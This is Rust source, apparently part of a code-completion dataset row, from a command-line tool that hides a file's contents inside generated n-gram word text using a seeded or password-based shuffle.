n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut bit_to_char_map = utils::make_bit_to_char_map(num_bits);
let mut original_bit_to_char_map = bit_to_char_map.clone();
utils::fill_bit_to_char_map(&mut rng, &mut bit_to_char_map);
utils::fill_bit_to_char_map(&mut original_rng, &mut original_bit_to_char_map);
let value_vec = get_value_vec(&mut bit_to_char_map, &contents, num_bits, use_shuffle, &mut rng);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify(
&gram_hash,
n_depth,
value_vec,
&mut original_rng,
&mut original_bit_to_char_map,
&unique_words,
total_words as f64,
consecutive_skips,
depth_skip_threshold,
use_shuffle,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode_char_value_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
value_mode: utils::ValueMode,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut char_to_value_map = utils::make_char_to_value_map(num_bits);
let mut original_char_to_value_map = char_to_value_map.clone();
utils::shuffle_char_value_map(&mut rng, &mut char_to_value_map);
utils::shuffle_char_value_map(&mut original_rng, &mut original_char_to_value_map);
// panic!("dsa");
let mut value_vec = get_value_vec_from_char_value_mode(
&contents,
num_bits,
use_shuffle,
&mut rng,
&mut char_to_value_map,
);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify_from_char_value_mode(
&gram_hash,
&mut original_char_to_value_map,
n_depth,
value_vec,
num_bits,
&unique_words,
total_words as f64,
use_shuffle,
value_mode,
&mut original_rng,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode(matches: &ArgMatches) -> Result<(), String> {
let file = utils::get_value(matches, "file")?;
let output = utils::get_value(matches, "output")?;
let mut seed_str = utils::get_value(matches, "seed")?;
let password_str = utils::get_value(matches, "password")?;
let alg_str = utils::get_value(matches, "algorithm")?;
let word_file_name = utils::get_value(matches, "words")?;
let n_depth = utils::get_numerical_value(matches, "n")?;
let consecutive_skips = utils::get_numerical_value(matches, "consecutive_skips")?;
let depth_skip_threshold = utils::get_numerical_value(matches, "depth_skip")?;
let num_bits = utils::get_numerical_value(matches, "bits")?;
if num_bits > 8 || num_bits < 1 {
return Err(format!("Bits must be between 1 and 8 inclusively, you provided {}", num_bits));
}
let pass;
match password_str {
"true" => {
// get seed string interactively
pass = rpassword::prompt_password_stderr("Enter password: ").unwrap();
seed_str = pass.as_str();
},
_ => (),
};
let alg = utils::get_algorithm_from_string(alg_str, num_bits)?;
let (use_shuffle, value_mode) = match alg {
utils::Algorithm::Shuffle(mode) => {
(true, mode)
},
utils::Algorithm::NoShuffle(mode) => {
(false, mode)
},
};
match value_mode {
utils::ValueMode::CharBitMap => {
encode_char_bit_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
)
},
utils::ValueMode::CharValueMap(val) => {
encode_char_value_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
value_mode,
)
},
}
} | use_shuffle: bool,
rng: &mut StdRng,
char_to_value_map: &mut HashMap<char, usize>,
) -> Vec<u8> { | random_line_split |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.